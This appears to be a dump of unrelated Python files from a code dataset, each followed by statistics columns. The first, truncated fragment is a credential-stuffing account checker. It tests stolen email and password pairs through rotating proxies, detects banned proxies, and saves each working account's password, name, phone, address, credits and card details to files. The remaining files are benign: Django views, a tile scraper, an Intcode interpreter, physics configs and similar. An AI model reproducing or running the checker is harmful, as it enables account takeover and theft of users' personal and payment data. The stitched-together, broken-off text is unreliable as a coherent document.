if (response.status_code == 403 or response.status_code == 406 or 'Access Denied' in response.text):
print(f"[Cloudflare Banned Proxy] {proxy}")
elif ('Login banned due to violation of terms of service' in response.text):
print(f"[Banned Proxy] {proxy}")
proxies.remove(proxy)
elif ('id' in response.text):
# Convert response to JSON
userData = response.json()
# Inject the user's password into the response object
userData['password'] = userPassword
# User's Personal Info
first_name = userData['first_name'] or None
last_name = userData['last_name'] or None
phone_number = userData['phone_number'] or None
# Account Credits
account_credits = userData['account_credits'] or None
# Default Address Info
default_address = userData['default_address'] or None
if default_address:
printable_address = default_address['printable_address'] or None
else:
printable_address = None
# Default Card Info
default_card = userData['default_card'] or None
if default_card:
default_card_type = default_card['type'] or None
default_card_exp_month = default_card['exp_month'] or None
default_card_exp_year = default_card['exp_year'] or None
default_card_last4 = default_card['last4'] or None
else:
default_card_type = None
default_card_exp_month = None
default_card_exp_year = None
default_card_last4 = None
# Can recieve alcohol
show_alcohol_experience = userData['show_alcohol_experience'] or None
# Combine into one string
outputString = createOutputString(userEmail, userPassword, first_name, last_name, phone_number, account_credits, printable_address, default_card_type, default_card_exp_month, default_card_exp_year, default_card_last4, show_alcohol_experience)
print(f"[Good Account] {outputString}")
try:
with open('out.txt', 'a') as f:
f.write(outputString)
f.close()
except:
print('[Write Fail] Failed to write account information to working file')
try:
workingJson.append(response.json())
with open('data.json', 'w') as outfile:
json.dump(workingJson, outfile)
outfile.close()
except:
print('[Write Fail] Failed to write account information to JSON')
except Exception as e:
print(f'[Checking Failed] {e}')
def main():
numThreads = input("How many threads would you like to use? ")
freeze_support()
pool = Pool(int(numThreads))
pool.map(checkAccount, accounts)
pool.close()
pool.join()
if __name__ == "__main__":
main() | 43.015873 | 254 | 0.632103 | 616 | 5,420 | 5.350649 | 0.261364 | 0.110134 | 0.059466 | 0.040352 | 0.257282 | 0.209041 | 0.182646 | 0.135619 | 0.124393 | 0.124393 | 0 | 0.005525 | 0.265314 | 5,420 | 126 | 255 | 43.015873 | 0.8222 | 0.042066 | 0 | 0.102804 | 0 | 0 | 0.2088 | 0.04342 | 0 | 0 | 0 | 0 | 0 | 1 | 0.046729 | false | 0.130841 | 0.046729 | 0.009346 | 0.130841 | 0.11215 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
d3979bc7f150cc1b30133b1b6f53958cab7914a1 | 1,732 | py | Python | resource/views.py | madre/PersonalWeb | 27d88a3c6c4f86028887b0455b60eceeeb663e25 | [
"Apache-2.0"
] | null | null | null | resource/views.py | madre/PersonalWeb | 27d88a3c6c4f86028887b0455b60eceeeb663e25 | [
"Apache-2.0"
] | null | null | null | resource/views.py | madre/PersonalWeb | 27d88a3c6c4f86028887b0455b60eceeeb663e25 | [
"Apache-2.0"
] | null | null | null | #coding=utf-8
"""
__create_time__ = '13-10-18'
__author__ = 'Madre'
"""
from django.shortcuts import get_object_or_404
from django.views.generic import ListView, DetailView
from resource.models import Resource, Topic
class ResourceListView(ListView):
context_object_name = 'resource_list'
template_name = "resource_list.html"
model = Resource
def get_context_data(self, **kwargs):
context = super(ResourceListView, self).get_context_data(**kwargs)
context["topic_list"] = Topic.objects.all()
return context
class ResourceDetailView(DetailView):
context_object_name = 'resource'
model = Resource
template_name = "resource_detail.html"
def get_object(self):
resource = get_object_or_404(Resource, pk=self.kwargs['pk'])
return resource
def get_context_data(self, **kwargs):
context = super(ResourceDetailView, self).get_context_data(**kwargs)
context["topic_list"] = Topic.objects.all()
return context
class DocsResourceView(ListView):
context_object_name = 'resource_list'
template_name = "resource_docs.html"
model = Resource
def get_queryset(self):
return Resource.objects.filter(resource_type__slug="docs")
class TopicDetailView(DetailView):
context_object_name = 'topic'
model = Topic
template_name = "topic_detail.html"
def get_object(self):
topic = get_object_or_404(Topic, pk=self.kwargs['pk'])
return topic
def get_context_data(self, **kwargs):
context = super(TopicDetailView, self).get_context_data(**kwargs)
context["topic_list"] = Topic.objects.all()
return context | 29.355932 | 77 | 0.680139 | 199 | 1,732 | 5.633166 | 0.256281 | 0.064228 | 0.074933 | 0.037467 | 0.521855 | 0.457627 | 0.41124 | 0.41124 | 0.37645 | 0.190901 | 0 | 0.011826 | 0.218822 | 1,732 | 59 | 78 | 29.355932 | 0.816704 | 0.035797 | 0 | 0.410256 | 0 | 0 | 0.093458 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.153846 | false | 0 | 0.076923 | 0.025641 | 0.794872 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
d3a01df5042d3b5b926bb9ab84e5cc8b7a1afdf6 | 1,304 | py | Python | tilescraper.py | azaroth42/iiif-harvester | 42202bb2edfbaceab594755b26ee75a81baa7212 | [
"Apache-2.0"
] | 2 | 2015-08-14T07:36:33.000Z | 2019-03-18T00:10:02.000Z | tilescraper.py | azaroth42/iiif-harvester | 42202bb2edfbaceab594755b26ee75a81baa7212 | [
"Apache-2.0"
] | null | null | null | tilescraper.py | azaroth42/iiif-harvester | 42202bb2edfbaceab594755b26ee75a81baa7212 | [
"Apache-2.0"
] | null | null | null | from PIL import Image
import json, StringIO, requests
import time
import robotparser
import re
import sys
host = "http://dlss-dev-azaroth.stanford.edu/"
service = host + "services/iiif/f1rc/"
resp = requests.get(service + "info.json")
js = json.loads(resp.text)
h = js['height']
w = js['width']
img = Image.new("RGB", (w,h), "white")
## Respect tile dimensions of server
tilesize = 1024
if js.has_key('tiles'):
tilesize = js['tiles'][0]['width']
## Introduce baseline crawl delay
delay = 1
## Parse robots.txt
resp = requests.get(host + "/robots.txt")
if resp.status_code == 200:
parser = robotparser.RobotFileParser()
parser.parse(resp.text)
okay = parser.can_fetch("*", service)
if not okay:
print "Blocked by robots.txt"
sys.exit()
# No support for Crawl-delay extension ... just search
cd = re.compile("Crawl-delay: ([0-9]+)")
m = cd.search(resp.text)
if m:
delay = int(m.groups()[0])
for x in range(w/tilesize+1):
for y in range(h/tilesize+1):
region = "%s,%s,%s,%s" % (x*tilesize, y*tilesize, tilesize, tilesize)
tileresp = requests.get(service + ("/%s/full/0/default.jpg" % region))
tile = Image.open(StringIO.StringIO(tileresp.content))
img.paste(tile, (x*tilesize,y*tilesize))
sys.stdout.write('.')
sys.stdout.flush()
time.sleep(delay)
img.save("full.jpg")
| 25.076923 | 72 | 0.680982 | 200 | 1,304 | 4.425 | 0.495 | 0.037288 | 0.033898 | 0.040678 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.014286 | 0.141104 | 1,304 | 51 | 73 | 25.568627 | 0.775893 | 0.102761 | 0 | 0 | 0 | 0 | 0.167959 | 0.018949 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.153846 | null | null | 0.025641 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d3a1a2d7710ed6f28bb8bbf86045de75345d5240 | 348 | py | Python | api/mira/api_config.py | tnc-ca-geo/animl-ml | 95aeb1e99fddf7199692144ef3425340d6b8dc3c | [
"MIT"
] | 1 | 2020-03-28T02:10:25.000Z | 2020-03-28T02:10:25.000Z | api/mira/api_config.py | tnc-ca-geo/animl-ml | 95aeb1e99fddf7199692144ef3425340d6b8dc3c | [
"MIT"
] | 46 | 2020-03-18T22:44:30.000Z | 2022-03-12T00:51:44.000Z | api/mira/api_config.py | tnc-ca-geo/animl-ml | 95aeb1e99fddf7199692144ef3425340d6b8dc3c | [
"MIT"
] | null | null | null | """
MIRA API config
"""
MODELS = [
{
"endpoint_name": "mira-large",
"classes": ["fox", "skunk", "empty"]
},
{
"endpoint_name": "mira-small",
"classes": ["rodent", "empty"]
}
]
HEADERS = {
"Access-Control-Allow-Origin": "*",
"Access-Control-Allow-Headers": "Content-Type",
"Access-Control-Allow-Methods": "POST"
} | 17.4 | 51 | 0.566092 | 35 | 348 | 5.571429 | 0.628571 | 0.2 | 0.276923 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.198276 | 348 | 20 | 52 | 17.4 | 0.698925 | 0.043103 | 0 | 0 | 0 | 0 | 0.564417 | 0.254601 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d3a22369e4aa53efec521f3dd343a0ada49809f4 | 3,545 | py | Python | AdventOfCode2019/day05.py | Matematik411/Advent-of-Code-Practice | f556ae8b84526368184f72a811949ec1fd4b686e | [
"MIT"
] | null | null | null | AdventOfCode2019/day05.py | Matematik411/Advent-of-Code-Practice | f556ae8b84526368184f72a811949ec1fd4b686e | [
"MIT"
] | null | null | null | AdventOfCode2019/day05.py | Matematik411/Advent-of-Code-Practice | f556ae8b84526368184f72a811949ec1fd4b686e | [
"MIT"
] | null | null | null | class Int_code:
def __init__(self, s, inputs):
memory = {}
nrs = map(int, s.split(","))
for i, x in enumerate(nrs):
memory[i] = x
self.memory = memory
self.inputs = inputs
def set(self, i, x):
self.memory[i] = x
def one(self, a, b, c, modes):
if modes % 10 == 0:
a = self.memory[a]
modes //= 10
if modes % 10 == 0:
b = self.memory[b]
self.memory[c] = a + b
def two(self, a, b, c, modes):
if modes % 10 == 0:
a = self.memory[a]
modes //= 10
if modes % 10 == 0:
b = self.memory[b]
self.memory[c] = a * b
def three(self, a, modes):
x = self.inputs.pop(0)
self.memory[a] = x
def four(self, a, modes):
if modes % 10 == 0:
a = self.memory[a]
print(a)
def five(self, a, b, modes):
if modes % 10 == 0:
a = self.memory[a]
modes //= 10
if modes % 10 == 0:
b = self.memory[b]
if a != 0:
return (True, b)
else:
return (False, 0)
def six(self, a, b, modes):
if modes % 10 == 0:
a = self.memory[a]
modes //= 10
if modes % 10 == 0:
b = self.memory[b]
if a == 0:
return (True, b)
else:
return (False, 0)
def seven(self, a, b, c, modes):
if modes % 10 == 0:
a = self.memory[a]
modes //= 10
if modes % 10 == 0:
b = self.memory[b]
self.memory[c] = 1 if (a < b) else 0
def eight(self, a, b, c, modes):
if modes % 10 == 0:
a = self.memory[a]
modes //= 10
if modes % 10 == 0:
b = self.memory[b]
self.memory[c] = 1 if (a == b) else 0
def run(self, start):
i = start
while True:
c = self.memory[i]
modes = c // 100
c %= 100
# print(i, self.memory[i])
if c == 99:
break
elif c == 1:
self.one(self.memory[i+1], self.memory[i+2], self.memory[i+3], modes)
i += 4
elif c == 2:
self.two(self.memory[i+1], self.memory[i+2], self.memory[i+3], modes)
i += 4
elif c == 3:
self.three(self.memory[i+1], modes)
i += 2
elif c == 4:
self.four(self.memory[i+1], modes)
i += 2
elif c == 5:
sol = self.five(self.memory[i+1], self.memory[i+2], modes)
if sol[0]:
i = sol[1]
else:
i += 3
elif c == 6:
sol = self.six(self.memory[i+1], self.memory[i+2], modes)
if sol[0]:
i = sol[1]
else:
i += 3
elif c == 7:
self.seven(self.memory[i+1], self.memory[i+2], self.memory[i+3], modes)
i += 4
elif c == 8:
self.eight(self.memory[i+1], self.memory[i+2], self.memory[i+3], modes)
i += 4
return self.memory[0]
start = input()
# part one
inputs_1 = [1]
computer = Int_code(start, inputs_1)
computer.run(0)
# part two
inputs_2 = [5]
computer = Int_code(start, inputs_2)
computer.run(0)
# # test
# inputs = [3]
# computer = Int_code(start, inputs)
# computer.run(0)
| 27.695313 | 87 | 0.414386 | 486 | 3,545 | 2.997942 | 0.121399 | 0.2814 | 0.158545 | 0.089224 | 0.663006 | 0.609472 | 0.609472 | 0.609472 | 0.609472 | 0.557996 | 0 | 0.059271 | 0.443159 | 3,545 | 127 | 88 | 27.913386 | 0.678825 | 0.031594 | 0 | 0.486486 | 0 | 0 | 0.000292 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.099099 | false | 0 | 0 | 0 | 0.153153 | 0.009009 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d3a3af9d53824b3acab405765cd51062c38ff21a | 4,177 | py | Python | fluorelax/fluorelax.py | darianyang/fluorelax | 4ca816aa157f23c84eb4cc6085200668723d1426 | [
"BSD-3-Clause"
] | null | null | null | fluorelax/fluorelax.py | darianyang/fluorelax | 4ca816aa157f23c84eb4cc6085200668723d1426 | [
"BSD-3-Clause"
] | null | null | null | fluorelax/fluorelax.py | darianyang/fluorelax | 4ca816aa157f23c84eb4cc6085200668723d1426 | [
"BSD-3-Clause"
] | 1 | 2022-03-27T18:24:49.000Z | 2022-03-27T18:24:49.000Z | """
Main call.
TODO:
- parallize the mda processing portion? (dask)
"""
import numpy as np
import matplotlib.pyplot as plt
import MDAnalysis as mda
from command_line import create_cmd_arguments, handle_command_line
from calc_relax import Calc_19F_Relaxation
from calc_fh_dists import Calc_FH_Dists
from plot_relax import Plot_Relaxation
# if python file is being used
if __name__ == '__main__':
# args_list to save time for now (TODO)
magnet = 14.1 # Tesla (600 MHz of 1H+)
tc = 8.2e-9 # 8.2ns for CypA, tc in sec
"""
Command line
"""
# Create command line arguments with argparse
argument_parser = create_cmd_arguments()
# Retrieve list of args
args = handle_command_line(argument_parser)
# TODO: hack for now, later put as seperate args?
# CSA tensors for 4F-Trp
if args.system == "w4f":
sgm11 = 11.2
sgm22 = -48.3
sgm33 = -112.8
elif args.system == "w5f":
sgm11 = 4.8
sgm22 = -60.5
sgm33 = -86.1
elif args.system == "w6f":
sgm11 = 12.9
sgm22 = -51.2
sgm33 = -91.6
elif args.system == "w7f":
sgm11 = 4.6
sgm22 = -48.3
sgm33 = -123.3
"""
Load trajectory or pdb data and calc all F-H distances.
# TODO: do for each frame, also test with water
"""
# TODO: for big trajectories, can't load in_memory, must stream it but this can be slow
traj = mda.Universe(args.parm, args.crd, in_memory=True, in_memory_step=args.step_size)
fh_dist_base = Calc_FH_Dists(traj, dist=3).run()
"""
For each distance value, calculate the R1 and R2 value.
"""
# TODO: update to ndarrays, maybe make into function, seperate script?
# test speed and optimize
# TODO: make this able to take multiple files and find stdev, maybe a seperate proc function
# array of size frames x 3 columns (frame, avg R1, avg R2) # TODO: add stdev?
r1_r2 = np.zeros(shape=(len(fh_dist_base.results[:,1:]), 3))
r1_r2[:, 0] = fh_dist_base.results[:,0]
# Here: calling each calc class seperately and only sum the dd contributions, csa is not dependent
# note this new implementation is alot slower... (compared to having just one calc_relax and averaging later)
# but not sure, didn't test the difference
for num, dists in enumerate(fh_dist_base.results[:,1:]):
calc_relax = Calc_19F_Relaxation(tc, magnet, sgm11, sgm22, sgm33)
r1_csa = calc_relax.calc_csa_r1()
r2_csa = calc_relax.calc_csa_r2()
# TODO: these are relatively small lists, may not need to change to ndarray
# but if I do, then I need to cut out the NaN or zero values before the np.mean step
r1_dd = 0
r2_dd = 0
for fh_dist in dists:
if fh_dist == 0:
continue # TODO: is there a better way to do this?
# instantiate the calc_relax class and then call individual class methods
calc_relax = Calc_19F_Relaxation(tc, magnet, sgm11, sgm22, sgm33, fh_dist)
# sum each dd contribution
r1_dd += calc_relax.calc_dd_r1()
r2_dd += calc_relax.calc_dd_r2()
# fill in col 1 (R1), col 2 (R2)
r1_r2[num, 1] = r1_dd + r1_csa
r1_r2[num, 2] = r2_dd + r2_csa
# test seperate values
print(r1_dd, r1_csa)
print(r2_dd, r2_csa)
"""
Save the frame, avg and stdev R1 and R2 data as a tsv?
"""
if args.output_file is not None:
np.savetxt(args.output_file, r1_r2, delimiter="\t")
"""
Plot the R1 and R2 data.
"""
# plt.plot(fh_dist_base.results[:,0], r1_r2[:,0])
# plt.plot(fh_dist_base.results[:,0], r1_r2[:,1])
plt.plot(r1_r2[:, 0], r1_r2[:, 1])
plt.plot(r1_r2[:, 0], r1_r2[:, 2])
print(f"R1-AVG={np.mean(r1_r2[:,1])}\nR2-AVG={np.mean(r1_r2[:,2])}")
#plt.hlines(1.99, xmin=0, xmax=fh_dist_base.results[-1,0]) # R1
#plt.hlines(109.1, xmin=0, xmax=fh_dist_base.results[-1,0]) # R2
plt.show()
# plotter class
# plotter = Plot_Relaxation(r1_r2, "dist")
# plotter.plot_r2()
# plt.show()
| 33.95935 | 113 | 0.620541 | 657 | 4,177 | 3.782344 | 0.357686 | 0.025755 | 0.032193 | 0.047887 | 0.160161 | 0.098994 | 0.098994 | 0.098994 | 0.098994 | 0.055131 | 0 | 0.063487 | 0.272205 | 4,177 | 122 | 114 | 34.237705 | 0.753947 | 0.374431 | 0 | 0.037037 | 0 | 0.018519 | 0.035794 | 0.025951 | 0 | 0 | 0 | 0.04918 | 0 | 1 | 0 | false | 0 | 0.12963 | 0 | 0.12963 | 0.055556 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d3aa5533cd819bec8e09e75cda19441c06cdc1f9 | 269 | py | Python | api/admin_urls.py | chenxiaoli/auth21 | a2b15ecb883416e011da03d6ec066459fa28f693 | [
"MIT"
] | null | null | null | api/admin_urls.py | chenxiaoli/auth21 | a2b15ecb883416e011da03d6ec066459fa28f693 | [
"MIT"
] | null | null | null | api/admin_urls.py | chenxiaoli/auth21 | a2b15ecb883416e011da03d6ec066459fa28f693 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from django.conf.urls import include, url
from .user_admin_views import UserAdminListViewSet
user_admin_list=UserAdminListViewSet.as_view({
"get":"get"
})
urlpatterns = (
url(r'^user$', user_admin_list, name='user-admin-list'),
)
| 15.823529 | 60 | 0.702602 | 35 | 269 | 5.2 | 0.6 | 0.197802 | 0.214286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004348 | 0.144981 | 269 | 16 | 61 | 16.8125 | 0.786957 | 0.078067 | 0 | 0 | 0 | 0 | 0.109756 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.25 | 0 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d3ab32f767c6d6e9a4d044cf91516005f20c48e6 | 1,236 | py | Python | awsf_cwl_v1/split_num.py | pkerpedjiev/tibanna | 8d8333bc7757076914c2bafbd68ee24c4ad611f6 | [
"MIT"
] | null | null | null | awsf_cwl_v1/split_num.py | pkerpedjiev/tibanna | 8d8333bc7757076914c2bafbd68ee24c4ad611f6 | [
"MIT"
] | null | null | null | awsf_cwl_v1/split_num.py | pkerpedjiev/tibanna | 8d8333bc7757076914c2bafbd68ee24c4ad611f6 | [
"MIT"
] | null | null | null | #!/usr/bin/python
import sys
import csv
def split_num(n, M):
# n : original number
# M : max size for split range
nsplit = n//M
if nsplit*M < n:
nsplit += 1
ninterval = n//nsplit
ncum = 1
end = 0
res = []
while end < n:
start = ncum
ncum += ninterval
end = ncum-1
if end > n:
end = n
res.append("{0}-{1}".format(start, end))
return res
def split_num_given_args():
n = int(sys.argv[1]) # original number
M = int(sys.argv[2]) # max size for split range
print split_num(n, M)
def split_chrom(chromsize_file, M):
with open(chromsize_file, 'r') as f:
reader = csv.reader(f, delimiter='\t')
for row in reader:
for interval in split_num(int(row[1]), int(M)):
print ("{chr}:{interval}".format(chr=row[0], interval=interval))
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(description="Arguments")
parser.add_argument("-c", "--chrom", help="Chrom.size file, tab-delimited")
parser.add_argument("-M", "--max_split_size", help="Maximum split size")
args = parser.parse_args()
split_chrom(args.chrom, args.max_split_size)
| 24.72 | 80 | 0.590615 | 175 | 1,236 | 4.028571 | 0.377143 | 0.04539 | 0.031206 | 0.028369 | 0.056738 | 0 | 0 | 0 | 0 | 0 | 0 | 0.011062 | 0.268608 | 1,236 | 49 | 81 | 25.22449 | 0.768805 | 0.085761 | 0 | 0 | 0 | 0 | 0.104889 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.085714 | null | null | 0.057143 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d3af3caa6c9db054915893aae3c8cc506266ac99 | 8,437 | py | Python | analysis/config/config_UltraLegacy18.py | cms-btv-pog/jet-tagging-sf | c418e13aa4eac5522818d5f5ad3db2a0c81ec52e | [
"Apache-2.0"
] | 3 | 2020-01-22T08:30:14.000Z | 2021-12-27T18:47:43.000Z | analysis/config/config_UltraLegacy18.py | cms-btv-pog/jet-tagging-sf | c418e13aa4eac5522818d5f5ad3db2a0c81ec52e | [
"Apache-2.0"
] | null | null | null | analysis/config/config_UltraLegacy18.py | cms-btv-pog/jet-tagging-sf | c418e13aa4eac5522818d5f5ad3db2a0c81ec52e | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
import scinum as sn
import numpy as np
def create_config(base_cfg):
# setup the config for 2018 data
from analysis.config.campaign_UltraLegacy18 import campaign as campaign_UltraLegacy18
from analysis.config.jet_tagging_sf import ch_ee, ch_emu, ch_mumu, ch_e, ch_mu
cfg = base_cfg.copy(campaign=campaign_UltraLegacy18)
# add datasets
dataset_names = [
"data_A_ee", "data_B_ee", "data_C_ee", "data_D_ee",
"data_A_emu", "data_B_emu", "data_C_emu", "data_D_emu",
"data_A_mumu", "data_B_mumu", "data_C_mumu", "data_D_mumu",
"data_A_e", "data_B_e", "data_C_e", "data_D_e",
"data_A_mu", "data_B_mu", "data_C_mu", "data_D_mu",
"tt_dl", "tt_sl",
"dy_lep_10To50",
#"dy_lep_50ToInf",
"dy_lep_LO_50ToInf",
#"dy_lep_0Jets", "dy_lep_1Jets", "dy_lep_2Jets",
"st_s_lep",
"st_t_t", "st_t_tbar",
"st_tW_t", "st_tW_tbar",
"WW", "WZ", "ZZ",
"W_lep",
#"ttH",
#"ttWJets_lep", "ttWJets_had", "ttZJets_lep", "ttZJets_had",
]
for dataset_name in dataset_names:
dataset = campaign_UltraLegacy18.get_dataset(dataset_name)
cfg.add_dataset(dataset)
# store channels per real dataset
cfg.set_aux("dataset_channels", {
dataset: cfg.get_channel(dataset.name.split("_")[-1])
for dataset in cfg.datasets.values()
if dataset.is_data
})
# store b-tagger working points
cfg.set_aux("working_points", {
"deepcsv": {
"loose": 0.1208,
"medium": 0.4168,
"tight": 0.7665,
},
"deepjet": {
"loose": 0.0490,
"medium": 0.2783,
"tight": 0.7100,
}
})
# luminosities per channel in /pb
cfg.set_aux("lumi", {
ch_ee: 59830.,
ch_emu: 59830.,
ch_mumu: 59830.,
ch_e: 59830.,
ch_mu: 59830.,
})
# run ranges
rr = cfg.set_aux("run_ranges", {
"A": (315252, 316995),
"B": (316998, 319312),
"C": (319313, 320393),
"D": (320394, 325273),
})
# global tags
cfg.set_aux("global_tag", {
"data": "106X_dataRun2_v28",
"mc": "106X_upgrade2018_realistic_v11_L1v1",
})
# lumi, normtag and pileup file
cfg.set_aux("lumi_file", "/afs/cern.ch/cms/CAF/CMSCOMM/COMM_DQM/certification/Collisions18/13TeV/"
"Legacy_2018/Cert_314472-325175_13TeV_Legacy2018_Collisions18_JSON.txt")
# https://twiki.cern.ch/twiki/bin/view/CMS/TWikiLUM
cfg.set_aux("normtag_file", "/cvmfs/cms-bril.cern.ch/cms-lumi-pog/Normtags/normtag_PHYSICS.json")
cfg.set_aux("pileup_file", "/afs/cern.ch/cms/CAF/CMSCOMM/COMM_DQM/certification/Collisions18/13TeV/"
"PileUp/pileup_latest.txt")
# triggers
# https://twiki.cern.ch/twiki/bin/view/CMS/TopTriggerYear2018
cfg.set_aux("triggers", {
ch_ee: [
"HLT_Ele23_Ele12_CaloIdL_TrackIdL_IsoVL_v*",
"HLT_Ele23_Ele12_CaloIdL_TrackIdL_IsoVL_DZ_v*",
],
ch_emu: [
"HLT_Mu23_TrkIsoVVL_Ele12_CaloIdL_TrackIdL_IsoVL_v*",
"HLT_Mu23_TrkIsoVVL_Ele12_CaloIdL_TrackIdL_IsoVL_DZ_v*",
"HLT_Mu12_TrkIsoVVL_Ele23_CaloIdL_TrackIdL_IsoVL_DZ_v*",
"HLT_Mu8_TrkIsoVVL_Ele23_CaloIdL_TrackIdL_IsoVL_DZ_v*",
],
ch_mumu: [
"HLT_Mu17_TrkIsoVVL_Mu8_TrkIsoVVL_DZ_Mass3p8_v*",
"HLT_Mu17_TrkIsoVVL_Mu8_TrkIsoVVL_DZ_Mass8_v*",
],
ch_e: [
"HLT_Ele35_WPTight_Gsf_v*",
"HLT_Ele28_eta2p1_WPTight_Gsf_HT150_v*",
],
ch_mu: [
"HLT_IsoMu24_v*",
],
})
# special triggers per real dataset
cfg.set_aux("data_triggers", {})
# MET filters
# https://twiki.cern.ch/twiki/bin/view/CMS/MissingETOptionalFiltersRun2
cfg.set_aux("metFilters", {
"data": [
"Flag_goodVertices", "Flag_globalSuperTightHalo2016Filter", "Flag_HBHENoiseFilter",
"Flag_HBHENoiseIsoFilter", "Flag_EcalDeadCellTriggerPrimitiveFilter",
"Flag_BadPFMuonFilter", #"Flag_BadChargedCandidateFilter",
"Flag_eeBadScFilter", #"Flag_ecalBadCalibReducedMINIAODFilter",
],
"mc": [
"Flag_goodVertices", "Flag_globalSuperTightHalo2016Filter", "Flag_HBHENoiseFilter",
"Flag_HBHENoiseIsoFilter", "Flag_EcalDeadCellTriggerPrimitiveFilter",
"Flag_BadPFMuonFilter", #"Flag_BadChargedCandidateFilter",
#"Flag_ecalBadCalibReducedMINIAODFilter",
],
})
# JER
cfg.set_aux("jer_version", "Summer19UL18_JRV2")
# JES
cfg.set_aux("jes_version", {
"data": [
rr["A"] + ("Summer19UL18_RunA_V5_DATA",),
rr["B"] + ("Summer19UL18_RunB_V5_DATA",),
rr["C"] + ("Summer19UL18_RunC_V5_DATA",),
rr["D"] + ("Summer19UL18_RunD_V5_DATA",),
],
"mc": [
(1, int(1e9), "Summer19UL18_V5_MC"),
],
})
# JES veto maps
cfg.set_aux("jes_veto_map", {
"file": "Summer19UL18_V1/hotjets-UL18.root",
"hist_name": "h2hot_ul18_plus_hem1516_plus_hbp2m1",
})
cfg.set_aux("jes_uncertainty_file", {
"factorized": None, # take file from jes github
"reduced": "",
})
# https://github.com/cms-sw/cmssw/blob/master/SimGeneral/MixingModule/python/mix_2018_25ns_UltraLegacy_PoissonOOTPU_cfi.py
cfg.set_aux("pileup_mc", [
8.89374611122e-07, 1.1777062868e-05, 3.99725585118e-05, 0.000129888015252, 0.000265224848687,
0.000313088635109, 0.000353781668514, 0.000508787237162, 0.000873670065767, 0.00147166880932,
0.00228230649018, 0.00330375581273, 0.00466047608406, 0.00624959203029, 0.00810375867901,
0.010306521821, 0.0129512453978, 0.0160303925502, 0.0192913204592, 0.0223108613632,
0.0249798930986, 0.0273973789867, 0.0294402350483, 0.031029854302, 0.0324583524255,
0.0338264469857, 0.0351267479019, 0.0360320204259, 0.0367489568401, 0.0374133183052,
0.0380352633799, 0.0386200967002, 0.039124376968, 0.0394201612616, 0.0394673457109,
0.0391705388069, 0.0384758587461, 0.0372984548399, 0.0356497876549, 0.0334655175178,
0.030823567063, 0.0278340752408, 0.0246009685048, 0.0212676009273, 0.0180250593982,
0.0149129830776, 0.0120582333486, 0.00953400069415, 0.00738546929512, 0.00563442079939,
0.00422052915668, 0.00312446316347, 0.00228717533955, 0.00164064894334, 0.00118425084792,
0.000847785826565, 0.000603466454784, 0.000419347268964, 0.000291768785963, 0.000199761337863,
0.000136624574661, 9.46855200945e-05, 6.80243180179e-05, 4.94806013765e-05, 3.53122628249e-05,
2.556765786e-05, 1.75845711623e-05, 1.23828210848e-05, 9.31669724108e-06, 6.0713272037e-06,
3.95387384933e-06, 2.02760874107e-06, 1.22535149516e-06, 9.79612472109e-07, 7.61730246474e-07,
4.2748847738e-07, 2.41170461205e-07, 1.38701083552e-07, 3.37678010922e-08, 0.0,
0.0, 0.0, 0.0, 0.0, 0.0,
0.0, 0.0, 0.0, 0.0, 0.0,
0.0, 0.0, 0.0, 0.0, 0.0,
0.0, 0.0, 0.0, 0.0
])
